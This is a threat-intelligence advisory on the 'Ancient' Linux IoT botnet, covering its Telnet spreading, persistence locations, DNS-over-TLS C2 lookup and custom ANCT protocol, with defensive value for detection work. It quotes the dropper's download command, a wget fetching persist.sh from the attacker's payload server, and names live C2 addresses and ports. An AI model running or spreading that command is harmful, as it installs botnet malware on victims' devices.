# "Ancient" Linux IoT botnet with custom ANCT C2 protocol (Telnet-spreading, DNS-over-TLS C2 resolution)

> Ancient is a previously undocumented Linux IoT botnet (Malpedia elf.ancient) that spreads via Telnet from already-infected devices, persists through cron, rc.local, init.d and profile.d, resolves its C2 over DNS-over-TLS, and communicates over a custom ANCT protocol. First samples were observed on 2026-10-04.

- **Published:** 2026-10-05T00:00:00Z
- **Last reviewed:** 2026-10-05T00:00:00Z
- **Canonical:** https://intel.threadlinqs.com/threat/TL-2026-2955
- **ID:** TL-2026-2955
- **Severity:** MEDIUM
- **Category:** MALWARE
- **Status:** ACTIVE
- **Detections:** 9 · **IOCs:** 24 (full data via the Threadlinqs MCP server — Purple tier)

## Description

Ancient is a Linux IoT botnet documented by Christophe Hubert (ksi-digital) on 2026-10-05 and catalogued by Malpedia as elf.ancient. The dropper, a shell script named persist.sh, ships 13 builds covering arm4-arm8, mips, mpsl, x86, x86_64, m68k, ppc and sh4.

Propagation is by Telnet: an already-infected device logs in to a target (the write-up reports empty-password root access, with probe routines testing for a working shell and busybox) and runs a command of the form 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.163.157.131:8080/persist.sh'. The target reports a status string back: ANCIENT_STARTED, ANCIENT_NOCONN, ANCIENT_SKIP or ANCIENT_FAIL.

The dropper installs persistence in several places: a cron entry running every 5 minutes (including /etc/crontab and /var/spool/cron/root), rc.local, /etc/init.d/.ancient and, from dropper v3, /etc/profile.d/.ancient.sh. The bot binary uses the hidden filename .ancient. Three dropper versions (2802 B, 3380 B, 5952 B) and two x86-64 bot builds (2026-10-04 15:37 and 19:09 UTC) were observed.

The bot stays dormant while being ptraced, so no network activity occurs under a debugger. It resolves its C2 domain zyrec2.duckdns.org over DNS-over-TLS to Cloudflare 1.1.1.1:853, which hides the lookup from port-53 monitoring. The C2 handshake on TCP/35342 is a custom ANCT protocol: the bot sends the 4-byte magic 'ANCT' (41 4E 43 54) plus 32 high-entropy bytes (ephemeral key exchange), the server replies with 36 high-entropy bytes, and the stream is encrypted thereafter. The compiled bot generates its C2 domain, port and ANCT tag at runtime, so static string signatures only apply to the dropper script; the ANCT magic is port-agnostic on the wire.

The payload server and C2 share one host (89.163.157.131, AS24961 myLoc/WIIT AG, Germany; payload on 8080, C2 on 35342). Telnet loader sources 94.154.43.138 (delivered Ancient) and 94.154.43.196 (delivered a Mirai kit) sit in AS219502. The source notes a shared loader routine with an unrelated Mirai variant from the same network range. No CVE is exploited, no actor is attributed and no impact beyond botnet recruitment is documented; severity is analyst-assigned.

## MITRE ATT&CK

- T1078.001 Default Accounts
- T1021 Remote Services
- T1059.004 Unix Shell
- T1053.003 Cron
- T1037.004 RC Scripts
- T1546.004 Unix Shell Configuration Modification
- T1564.001 Hidden Files and Directories
- T1622 Debugger Evasion
- T1095 Non-Application Layer Protocol
- T1573 Encrypted Channel
- T1568 Dynamic Resolution
- T1071.004 DNS
- T1571 Non-Standard Port
- T1082 System Information Discovery
- T1049 System Network Connections Discovery

## Sources

- ["Ancient": a Linux IoT botnet with a custom ANCT C2 protocol (Christophe Hubert, ksi-digital)](https://github.com/ksi-digital/threat-research/tree/main/ancient-botnet)
- [Malpedia library entry (elf.ancient)](https://malpedia.caad.fkie.fraunhofer.de/library/f1c0418e-66d5-451c-84e9-12cea0cee217/)
- [ksi-digital ancient-botnet IOC list (iocs.csv)](https://raw.githubusercontent.com/ksi-digital/threat-research/main/ancient-botnet/iocs.csv)
- [ksi-digital ancient-botnet detection rules (YARA, Suricata, Sigma)](https://github.com/ksi-digital/threat-research/tree/main/ancient-botnet/detection)
- [ksi-digital ancient-botnet README (technical write-up)](https://raw.githubusercontent.com/ksi-digital/threat-research/main/ancient-botnet/README.md)
- [ThreatFox IOC database (C2 89.163.157.131:35342 reported 2026-10-05)](https://threatfox.abuse.ch/)
- [URLhaus payload URLs 3928556, 3928557, 3927883](https://urlhaus.abuse.ch/)

## Full data

Detection queries (Splunk SPL / Microsoft KQL / Sigma) and IOC values require the Threadlinqs MCP server (Purple tier): https://intel.threadlinqs.com/mcp

Canonical: https://intel.threadlinqs.com/threat/TL-2026-2955
